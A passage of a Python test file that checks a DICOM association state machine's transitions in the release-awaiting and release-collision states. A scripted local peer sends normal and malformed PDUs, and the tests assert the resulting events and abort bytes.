('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt14']
def test_evt15(self):
"""Test Sta7 + Evt15."""
# Sta7 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU and start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
self.assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt15']
def test_evt16(self):
"""Test Sta7 + Evt16."""
# Sta7 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT and close connection
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_abort),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt16']
def test_evt17(self):
"""Test Sta7 + Evt17."""
# Sta7 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt17']
def test_evt18(self):
"""Test Sta7 + Evt18."""
# Sta7 + Evt18 -> <ignore> -> Sta7
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt18']
def test_evt19(self):
"""Test Sta7 + Evt19."""
# Sta7 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', b'\x08\x00\x00\x00\x00\x00'),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt19']
        # The peer received the A-ASSOCIATE-RQ, A-RELEASE-RQ and then the
        # A-ABORT PDU: type 0x07, length 4, source 0x02 (DUL service-provider)
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
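# The State 8 tests park the local (requestor) FSM in Sta8 by having the
# scripted peer send an A-RELEASE-RQ PDU (Sta6 + Evt12 -> AR-2 -> Sta8) while
# ACSE.is_release_requested is overridden to return False, apparently so the
# association reactor never answers the release itself and the state machine
# stays in "Awaiting A-RELEASE (rp) primitive" for the duration of each test.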
class TestState08(TestStateBase):
"""Tests for State 08: Awaiting A-RELEASE (rp) primitive."""
def test_evt01(self):
"""Test Sta8 + Evt1."""
# Sta8 + Evt1 -> <ignore> -> Sta8
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta8 + Evt2."""
# Sta8 + Evt2 -> <ignore> -> Sta8
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta8 + Evt3."""
# Sta8 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('send', a_associate_ac),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt3', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt3']
def test_evt04(self):
"""Test Sta8 + Evt4."""
# Sta8 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('send', a_associate_rj),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt4', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta8 + Evt5."""
# Sta8 + Evt5 -> <ignore> -> Sta8
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta8 + Evt6."""
# Sta8 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('send', a_associate_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt6']
def test_evt07(self):
"""Test Sta8 + Evt7."""
# Sta8 + Evt7 -> <ignore> -> Sta8
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt7']
def test_evt08(self):
"""Test Sta8 + Evt8."""
# Sta8 + Evt8 -> <ignore> -> Sta8
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt8']
def test_evt09(self):
"""Test Sta8 + Evt9."""
# Sta8 + Evt9 -> AR-7 -> Sta8
# Evt9: Receive P-DATA primitive from <local user>
# AR-7: Send P-DATA-TF PDU to <remote>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt9']
def test_evt10(self):
"""Test Sta8 + Evt10."""
# Sta8 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('send', p_data_tf),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt10', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt10']
def test_evt11(self):
"""Test Sta8 + Evt11."""
# Sta8 + Evt11 -> <ignore> -> Sta8
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt11']
def test_evt12(self):
"""Test Sta8 + Evt12."""
# Sta8 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
            ('recv', None),  # recv a-associate-rq
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt12', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt12']
def test_evt13(self):
"""Test Sta8 + Evt13."""
# Sta8 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('send', a_release_rp),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt13', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt13']
def test_evt14(self):
"""Test Sta8 + Evt14."""
# Sta8 + Evt14 -> AR-4 -> Sta13
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
# AR-4: Send A-RELEASE-RP PDU and start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt14']
def test_evt15(self):
"""Test Sta8 + Evt15."""
# Sta8 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU and start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt15']
def test_evt16(self):
"""Test Sta8 + Evt16."""
        # Sta8 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT and close connection
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('send', a_abort),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt16']
def test_evt17(self):
"""Test Sta8 + Evt17."""
# Sta8 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt17']
def test_evt18(self):
"""Test Sta8 + Evt18."""
        # Sta8 + Evt18 -> <ignore> -> Sta8
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt18']
def test_evt19(self):
"""Test Sta8 + Evt19."""
# Sta8 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('send', b'\x08\x00\x00\x00\x00\x00'),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt19']
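# The State 9 tests create a release collision on the requestor side: the
# local user sends an A-RELEASE-RQ (Sta6 + Evt11 -> AR-1 -> Sta7) and the
# scripted peer replies with its own A-RELEASE-RQ (Sta7 + Evt12 -> AR-8 ->
# Sta9).  Where an A-ABORT PDU is expected from the local side, the asserted
# bytes b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00' decode as: PDU type 0x07
# (A-ABORT), length 4, source 0x02 (DUL service-provider), reason 0x00.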
class TestState09(TestStateBase):
"""Tests for State 09: Release collision req - awaiting A-RELEASE (rp)."""
def test_evt01(self):
"""Test Sta9 + Evt1."""
# Sta9 + Evt1 -> <ignore> -> Sta9
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.1), # no response
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt1'
]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta9 + Evt2."""
# Sta9 + Evt2 -> <ignore> -> Sta9
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta9 + Evt3."""
# Sta9 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_associate_ac), # trigger event
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt3', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt3'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt04(self):
"""Test Sta9 + Evt4."""
# Sta9 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq),
('send', a_associate_rj),
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt4', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt4'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta9 + Evt5."""
# Sta9 + Evt5 -> <ignore> -> Sta9
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta9 + Evt6."""
# Sta9 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
